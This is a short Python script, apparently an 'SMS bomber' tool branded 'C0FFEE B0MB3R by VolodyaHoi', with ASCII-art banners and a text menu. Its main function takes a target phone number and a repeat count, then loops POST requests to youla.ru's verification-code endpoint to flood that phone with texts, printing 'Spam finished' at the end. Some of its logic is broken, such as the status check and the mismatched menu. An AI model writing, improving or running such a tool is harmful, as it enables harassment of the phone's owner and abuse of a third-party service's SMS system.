from colorama import Fore, Back, Style
import os
import sys
import time
import requests

test = 1
start = False
def starting():
    start = True


def inp():
    clear()
    logo()
    funcs()
    test = int(input())
    if test == 1:
        phone = int(input("Enter number "))
        roll = int(input("Enter rolls "))
        waittime = int(input("Enter wait (sec) "))
        for i in range(0, roll):
            socket = requests.post("https://youla.ru/web-api/auth/request_code", data={"phone": phone})
            
            if socket == 200:
                print("Sended")
            else:
                print("Failed")
            time.sleep(waittime)
        fin = input("Spam finished, press Enter ")
        inp()
                                
        #print("cum")
        #inp() 
        #глушим спам
    elif test == 2:
        #print("Config")
        os.system("python -m pip install requests colorama")
        inp()
    elif test == 3:
        exit()
    else:
        print("Wrong number press Enter")
        #inp()
        #если нажат энтер возврат
    

def clear():
    os.system('cls' if os.name=='nt' else 'clear')

def logo():
    #print("...C0FFEE....B0MB3R.....\n⠄⠄⠄⠄⠄⠄⠄⢀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⠄⠄⠈⢲⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⠄⠄⠄⣰⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⠄⢀⣴⣿⠟⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⣠⣾⡿⠋⢠⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⣸⣿⠋⠄⣼⡁⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⢰⣿⠇⠄⠄⠘⢷⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠸⣿⠄⠄⠄⠄⠈⠻⣧⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠹⣧⡀⠄⠄⠄⠄⢸⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⠄⠉⠄⠄⠄⠠⠊⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠄⠄⣀⣠⣤⣤⣤⣄⢀⣀⢀⠄⠄⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⣤⣶⣿⡿⠋⠉⠉⠉⠉⠉⠉⠙⠺⢬⡢⠄⠄⠄⠄⠄⠄⠄\n⠄⠠⣻⡿⢿⣭⣒⣲⣶⣶⣶⣦⣤⣄⡀⣜⣵⠄⠄⠄⠄⠄⠄⠄\n⠄⡄⠄⠉⠛⠺⠿⠿⣭⣭⣭⣭⣿⣷⣿⣿⣿⢰⣂⣉⣒⣦⡀⠄\n⠄⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⢸⣿⣿⣿⢸⠟⠙⠻⣿⣵⡀\n⠄⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⢰⢸⣿⣿⣿⠈⠄⠄⠄⢸⣿⡇\n⠄⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⢸⢸⣿⣿⣿⠄⠄⠄⠄⢠⣽⡇\n⠄⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣿⢸⣿⣿⣿⢠⣀⠄⣀⣾⣿⠃\n⠄⣷⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣿⢸⣿⣿⣿⣤⣬⣭⣵⡿⠃⠄\n⠄⣿⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣿⢸⣿⣿⣿⠙⠛⠛⠉⠄⠄⠄\n⠄⣿⣄⠄⠄⠄⠄⠄⠄⠄⠄⢸⣿⢸⣿⣿⣿⠄⠄⠄⠄⠄⠄⠄\n⠄⠘⠿⣶⣤⣄⠄⠄⠄⠄⣀⣼⣿⣾⣿⣿⠟⠄⠄⠄⠄⠄⠄⠄\n⠄⠄⠄⠄⠉⠙⠛⠛⠿⠿⠿⠟⠛⠛⠉⠄⠄⠄⠄⠄⠄⠄⠄⠄\n.......by VolodyaHoi....\n........................")
    print('''
░█████╗░░█████╗░███████╗███████╗███████╗███████╗
██╔══██╗██╔══██╗██╔════╝██╔════╝██╔════╝██╔════╝
██║░░╚═╝██║░░██║█████╗░░█████╗░░█████╗░░█████╗░░
██║░░██╗██║░░██║██╔══╝░░██╔══╝░░██╔══╝░░██╔══╝░░
╚█████╔╝╚█████╔╝██║░░░░░██║░░░░░███████╗███████╗
░╚════╝░░╚════╝░╚═╝░░░░░╚═╝░░░░░╚══════╝╚══════╝
B0MB3R by VolodyaHoi''')
    print("==========================")

def funcs():
    print("[1] Start SPAM")
    print("[2] Config")
    print("[3] Links")
    print("[4] Exit")
    #print(info)
            
inp()

